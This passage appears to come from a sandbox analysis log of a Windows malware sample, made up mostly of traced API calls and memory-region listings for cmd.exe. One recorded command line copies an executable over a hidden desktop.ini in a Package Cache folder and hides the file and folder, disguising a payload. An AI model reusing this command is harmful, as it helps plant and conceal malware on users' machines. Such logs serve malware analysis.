lpBuffer=0x1aeff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aeff8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] GetFileType (hFile=0x4c) returned 0x1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] WriteFile (in: hFile=0x4c, lpBuffer=0x1af048*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af048*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] GetFileType (hFile=0x4c) returned 0x1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] WriteFile (in: hFile=0x4c, lpBuffer=0x1af098*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af098*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] GetFileType (hFile=0x4c) returned 0x1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af0e8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] GetFileType (hFile=0x4c) returned 0x1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] WriteFile (in: hFile=0x4c, lpBuffer=0x1af138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af138*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] GetFileType (hFile=0x4c) returned 0x1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] WriteFile (in: hFile=0x4c, lpBuffer=0x1af188*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af188*, lpNumberOfBytesWritten=0x1ae18c*=0x20, lpOverlapped=0x0) returned 1 [0207.322] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.322] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae178 | out: lpNewFilePointer=0x0) returned 1 [0207.322] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.322] ReadFile (in: hFile=0x54, lpBuffer=0x1aefa8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae198, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesRead=0x1ae198*=0x200, lpOverlapped=0x0) returned 1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] GetFileType (hFile=0x4c) returned 0x1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] GetFileType (hFile=0x4c) returned 0x1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] GetFileType (hFile=0x4c) returned 0x1 [0207.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aeff8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] GetFileType (hFile=0x4c) returned 0x1 [0207.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] WriteFile (in: hFile=0x4c, lpBuffer=0x1af048*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af048*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] GetFileType (hFile=0x4c) returned 0x1 [0207.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] WriteFile (in: hFile=0x4c, lpBuffer=0x1af098*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af098*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] GetFileType (hFile=0x4c) returned 0x1 [0207.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af0e8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] GetFileType (hFile=0x4c) returned 0x1 [0207.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] WriteFile (in: hFile=0x4c, lpBuffer=0x1af138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af138*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] GetFileType (hFile=0x4c) returned 0x1 [0207.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] WriteFile (in: hFile=0x4c, lpBuffer=0x1af188*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af188*, lpNumberOfBytesWritten=0x1ae18c*=0x20, lpOverlapped=0x0) returned 1 [0207.323] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.324] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae178 | out: lpNewFilePointer=0x0) returned 1 [0207.324] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.324] ReadFile (in: hFile=0x54, lpBuffer=0x1aefa8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae198, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesRead=0x1ae198*=0x200, lpOverlapped=0x0) returned 1 [0207.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.324] GetFileType (hFile=0x4c) returned 0x1 [0207.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.324] GetFileType (hFile=0x4c) returned 0x1 [0207.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.324] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.324] GetFileType (hFile=0x4c) returned 0x1 [0207.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.324] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aeff8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.324] GetFileType (hFile=0x4c) returned 0x1 [0207.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.324] WriteFile (in: hFile=0x4c, lpBuffer=0x1af048*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af048*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.324] GetFileType (hFile=0x4c) returned 0x1 [0207.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.324] WriteFile (in: hFile=0x4c, lpBuffer=0x1af098*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af098*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.324] GetFileType (hFile=0x4c) returned 0x1 [0207.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.325] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af0e8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.325] GetFileType (hFile=0x4c) returned 0x1 [0207.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.325] WriteFile (in: hFile=0x4c, lpBuffer=0x1af138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af138*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.325] GetFileType (hFile=0x4c) returned 0x1 [0207.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.325] WriteFile (in: hFile=0x4c, lpBuffer=0x1af188*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af188*, lpNumberOfBytesWritten=0x1ae18c*=0x20, lpOverlapped=0x0) returned 1 [0207.325] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.325] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae178 | out: lpNewFilePointer=0x0) returned 1 [0207.325] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.325] ReadFile (in: hFile=0x54, lpBuffer=0x1aefa8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae198, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesRead=0x1ae198*=0x32, lpOverlapped=0x0) returned 1 [0207.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.325] GetFileType (hFile=0x4c) returned 0x1 [0207.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.325] GetFileType (hFile=0x4c) returned 0x1 [0207.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.325] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefa8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesWritten=0x1ae18c*=0x32, lpOverlapped=0x0) returned 1 [0207.325] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.325] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae178 | out: lpNewFilePointer=0x0) returned 1 [0207.326] _close (_FileHandle=4) returned 0 [0207.326] FindNextFileW (in: hFindFile=0x200e80, lpFindFileData=0x1af20c | out: lpFindFileData=0x1af20c) returned 0 [0207.326] GetLastError () returned 0x12 [0207.326] FindClose (in: hFindFile=0x200e80 | out: hFindFile=0x200e80) returned 1 [0207.327] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0207.327] _close (_FileHandle=3) returned 0 [0207.327] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.327] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0207.328] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.328] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0207.328] _get_osfhandle (_FileHandle=0) returned 0x3 [0207.328] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0207.328] SetConsoleInputExeNameW () returned 0x1 [0207.328] GetConsoleOutputCP () returned 0x1b5 [0207.328] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0207.328] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.328] exit (_Code=0) Process: id = "501" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16f20" os_pid = "0x86c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30536 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30537 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 30538 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 30539 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 30540 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30541 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30542 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30543 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30544 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 30545 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30594 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30595 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30596 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30597 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 30598 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 30599 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30600 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30601 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30602 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30603 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30604 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30605 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30606 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30607 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30608 start_va = 0x3b0000 end_va = 0x477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 30609 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30610 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30611 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 30612 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 30613 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 30614 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 30615 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 30616 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 30617 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 30618 start_va = 0x1300000 end_va = 0x15cefff entry_point = 0x1300000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 698 os_tid = 0x4f4 [0207.477] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f87c | out: lpSystemTimeAsFileTime=0x12f87c*(dwLowDateTime=0xb07a9020, dwHighDateTime=0x1d440a9)) [0207.477] GetCurrentProcessId () returned 0x86c [0207.477] GetCurrentThreadId () returned 0x4f4 [0207.477] GetTickCount () returned 0x3a5cf [0207.477] QueryPerformanceCounter (in: lpPerformanceCount=0x12f874 | out: lpPerformanceCount=0x12f874*=26426816797) returned 1 [0207.480] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0207.480] __set_app_type (_Type=0x1) [0207.480] __p__fmode () returned 0x76b331f4 [0207.480] __p__commode () returned 0x76b331fc [0207.480] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0207.480] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0207.480] GetCurrentThreadId () returned 0x4f4 [0207.480] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x4f4) returned 0x38 [0207.481] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0207.481] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0207.481] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.481] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0207.481] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f80c | out: phkResult=0x12f80c*=0x0) returned 0x2 [0207.481] VirtualQuery (in: lpAddress=0x12f843, lpBuffer=0x12f7dc, dwLength=0x1c | out: lpBuffer=0x12f7dc*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0207.481] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12f7dc, dwLength=0x1c | out: lpBuffer=0x12f7dc*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0207.481] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12f7dc, dwLength=0x1c | out: lpBuffer=0x12f7dc*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0207.481] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12f7dc, dwLength=0x1c | out: lpBuffer=0x12f7dc*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0207.481] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12f7dc, dwLength=0x1c | out: lpBuffer=0x12f7dc*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0207.481] GetConsoleOutputCP () returned 0x1b5 [0207.481] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0207.482] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0207.482] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.482] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0207.482] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.482] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0207.482] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.482] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0207.482] _get_osfhandle (_FileHandle=0) returned 0x3 [0207.482] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0207.482] _get_osfhandle (_FileHandle=0) returned 0x3 [0207.482] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0207.483] GetEnvironmentStringsW () returned 0x2304b0* [0207.483] FreeEnvironmentStringsW (penv=0x2304b0) returned 1 [0207.483] GetEnvironmentStringsW () returned 0x2304b0* [0207.483] FreeEnvironmentStringsW (penv=0x2304b0) returned 1 [0207.483] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e77c | out: phkResult=0x12e77c*=0x40) returned 0x0 [0207.483] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x0, lpData=0x12e788*=0x60, lpcbData=0x12e780*=0x1000) returned 0x2 [0207.483] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x4, lpData=0x12e788*=0x1, lpcbData=0x12e780*=0x4) returned 0x0 [0207.483] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x0, lpData=0x12e788*=0x1, lpcbData=0x12e780*=0x1000) returned 0x2 [0207.483] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x4, lpData=0x12e788*=0x0, lpcbData=0x12e780*=0x4) returned 0x0 [0207.483] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x4, lpData=0x12e788*=0x40, lpcbData=0x12e780*=0x4) returned 0x0 [0207.483] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x4, lpData=0x12e788*=0x40, lpcbData=0x12e780*=0x4) returned 0x0 [0207.484] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x0, lpData=0x12e788*=0x40, lpcbData=0x12e780*=0x1000) returned 0x2 [0207.484] RegCloseKey (hKey=0x40) returned 0x0 [0207.484] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e77c | out: phkResult=0x12e77c*=0x40) returned 0x0 [0207.484] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x0, lpData=0x12e788*=0x40, lpcbData=0x12e780*=0x1000) returned 0x2 [0207.484] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x4, lpData=0x12e788*=0x1, lpcbData=0x12e780*=0x4) returned 0x0 [0207.484] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x0, lpData=0x12e788*=0x1, lpcbData=0x12e780*=0x1000) returned 0x2 [0207.484] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x4, lpData=0x12e788*=0x0, lpcbData=0x12e780*=0x4) returned 0x0 [0207.484] RegQueryValueExW (in: hKey=0x40, 